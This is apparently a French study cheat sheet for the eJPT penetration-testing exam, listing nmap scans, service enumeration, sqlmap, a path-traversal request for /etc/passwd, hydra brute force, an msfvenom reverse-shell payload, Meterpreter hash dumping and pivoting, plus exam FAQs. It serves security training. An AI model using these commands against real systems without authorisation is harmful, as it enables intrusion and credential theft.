Cheatsheet eJPT 2026

Les commandes accessibles aux débutants pour l'examen INE eLearnSecurity Junior Penetration Tester — découverte d'hôtes, scanning, énumération, attaques web, Metasploit et pivoting de base. Pas de rapport, juste les fondamentaux.

Mis à jour :

Navigation rapide

01 Découverte d'hôtes & Scanning 02 Énumération 03 Attaques Web 04 Exploitation (Metasploit) 05 Post-Exploitation & Pivoting 06 Conseils Examen

# Découverte d'hôtes & Scanning

L'eJPT commence par trouver les hôtes vivants et les ports ouverts. Maîtrise nmap — c'est l'outil le plus important de l'examen.

nmap -sn 10.10.10.0/24
Ping sweep — découvre les hôtes vivants sur le sous-réseau
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
Scan TCP complet d'un hôte
nmap -p OPEN_PORTS -sC -sV TARGET
Détection service/version + scripts par défaut sur les ports ouverts
nmap -sU --top-ports 100 TARGET
N'oublie pas l'UDP — SNMP, DNS et TFTP s'y cachent souvent

# Énumération

Réponds aux questions de l'examen en énumérant chaque service. Utilisateurs, partages, versions et configs : c'est ce que les questions demandent.

💡 Astuce eJPT : l'examen est basé sur des questions — lis d'abord chaque question, puis énumère le service précis qu'elle vise.
smbclient -N -L //TARGET ; enum4linux-ng -A TARGET
Liste les partages SMB (session null) et énumération SMB/RPC complète
snmpwalk -v2c -c public TARGET
SNMP walk avec communauté « public » — fuite users, processus, logiciels
ftp TARGET # essaie anonymous / anonymous
Vérifie l'accès FTP anonyme
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
Brute-force de répertoires pour trouver des pages web cachées

# Attaques Web

L'eJPT couvre les vulnérabilités web de base : injection SQL, XSS et directory traversal. Burp Suite et sqlmap font le gros du travail.

sqlmap -u "http://TARGET/page.php?id=1" --batch --dbs
Injection SQL automatisée — énumère les bases de données
sqlmap -u "http://TARGET/page.php?id=1" --batch -D db -T users --dump
Dump une table — contient souvent la réponse à une question d'examen
curl "http://TARGET/page?file=../../../../etc/passwd"
Directory traversal / LFI — lit les fichiers locaux
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
Brute-force d'un formulaire de login web avec Hydra

# Exploitation (Metasploit)

Contrairement à l'OSCP, l'eJPT encourage Metasploit. Apprends le workflow msfconsole — c'est ton principal outil d'exploitation.

💡 Astuce eJPT : Metasploit est totalement autorisé. Utilise search, définis RHOSTS/LHOST, puis run.
msfconsole -q ; search TYPE:exploit SERVICE
Lance Metasploit et cherche un module d'exploit correspondant
use exploit/MODULE ; set RHOSTS TARGET ; set LHOST YOUR_IP ; run
Configure et lance un exploit pour une session Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe
Génère un payload Meterpreter pour une livraison manuelle
use exploit/multi/handler ; set PAYLOAD windows/meterpreter/reverse_tcp ; run
Réceptionne la connexion Meterpreter inverse

# Post-Exploitation & Pivoting

Une fois une session Meterpreter obtenue, collecte des infos et pivote vers les sous-réseaux internes — un scénario classique de l'eJPT.

getuid ; sysinfo ; hashdump
Meterpreter — identifie l'utilisateur, l'hôte et dump les hashes locaux
run autoroute -s 192.168.1.0/24
Ajoute une route via la session pour atteindre un sous-réseau interne
use auxiliary/server/socks_proxy ; run # puis utilise proxychains
Démarre un proxy SOCKS pour faire passer des outils externes par le pivot
proxychains4 nmap -sT -Pn -p 445,3389 192.168.1.10
Scanne le réseau interne à travers le pivot

# Conseils Examen eJPT

Stratégie pour l'examen accessible et basé sur des questions.

❓ Lis d'abord les questions : l'examen est dynamique et basé sur des questions — chacune te dit exactement quoi chercher. Énumère avec la question en tête.
🧰 Utilise Metasploit librement : contrairement à l'OSCP, il est encouragé. Apprends le search msfconsole, les sessions et autoroute.
🔎 Énumère tout : la plupart des mauvaises réponses viennent d'un service manqué. Scanne tous les ports, vérifie l'UDP, lis les bannières.
🗺️ Pratique le pivoting : le réseau d'examen a des hôtes internes — pratique autoroute et proxychains avant l'examen.
📄 Pas de rapport : contrairement à l'OSCP/CPTS/PNPT, tu ne rédiges pas de rapport — concentre-toi entièrement sur les réponses.

❓ Questions fréquentes eJPT

L'eJPT d'INE est un examen 100% pratique et accessible aux débutants. Tu disposes d'environ 48 heures dans un lab en direct et tu réponds à une série de questions à choix multiples en trouvant des flags et infos sur le réseau cible. Il n'y a aucun rapport écrit.

Non. Contrairement à l'OSCP, la CPTS ou le PNPT, l'eJPT ne demande pas de rapport professionnel. C'est un examen dynamique basé sur des questions : tu exploites le lab et réponds à des questions à choix multiples. L'une des certifications pratiques les plus accessibles aux débutants.

Oui — l'eJPT est largement considéré comme la meilleure certification pentest pratique d'entrée de gamme. Il suppose peu d'expérience et s'accompagne du cours Penetration Testing Student (PTS) d'INE. Il couvre les fondamentaux : scanning, énumération, attaques web, Metasploit et pivoting de base.

Oui — Metasploit est totalement autorisé et même encouragé. Contrairement à l'OSCP (qui le limite à une machine), l'eJPT attend que tu utilises Metasploit et Meterpreter pour l'exploitation, le pivoting (autoroute/socks) et la post-exploitation.

La plupart des candidats ont besoin de 1 à 3 mois. Terminer le parcours Penetration Testing Student (PTS) d'INE et s'entraîner sur des boxes débutantes HackTheBox et TryHackMe suffit à la majorité pour réussir.

L'eJPT se concentre sur les fondamentaux réseau et web et inclut du pivoting de base (routage via un hôte compromis pour atteindre un sous-réseau interne). Ce n'est pas un examen très orienté Active Directory comme la CPTS ou le PNPT.

Passe l'eJPT en premier. C'est la certif d'entrée de gamme qui construit les fondamentaux (scanning, énumération, exploitation, pivoting de base) sans rapport ni buffer overflow. L'OSCP est un gros cran au-dessus. eJPT → OSCP/CPTS est un parcours courant.

Oui. INE inclut généralement un retake gratuit avec le voucher, et l'examen est pensé pour être accessible aux débutants. Vérifie la politique actuelle d'INE pour les détails exacts avant de programmer.

nmap pour le scan, gobuster/dirb et Burp Suite pour le web, sqlmap pour l'injection SQL, Metasploit/Meterpreter pour l'exploitation et le pivoting, hydra pour le brute force, et les outils d'énumération de base (enum4linux, smbclient). Les fondamentaux comptent plus que les outils avancés.

Oui — comme accélérateur d'apprentissage. La mindmap gratuite organise 12 020+ commandes couvrant tous les domaines eJPT (scanning, énumération, web, Metasploit, pivoting) avec recherche instantanée, pour que les débutants trouvent vite la bonne commande. Respecte toujours les règles de ton examen.

📚 Ressources liées

Prépare ton eJPT avec 12 020+ commandes

Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée — parfait pour trouver vite la bonne commande pendant ta prépa eJPT.

Commencer gratuitement →
📎 Cette cheatsheet t'a été utile ?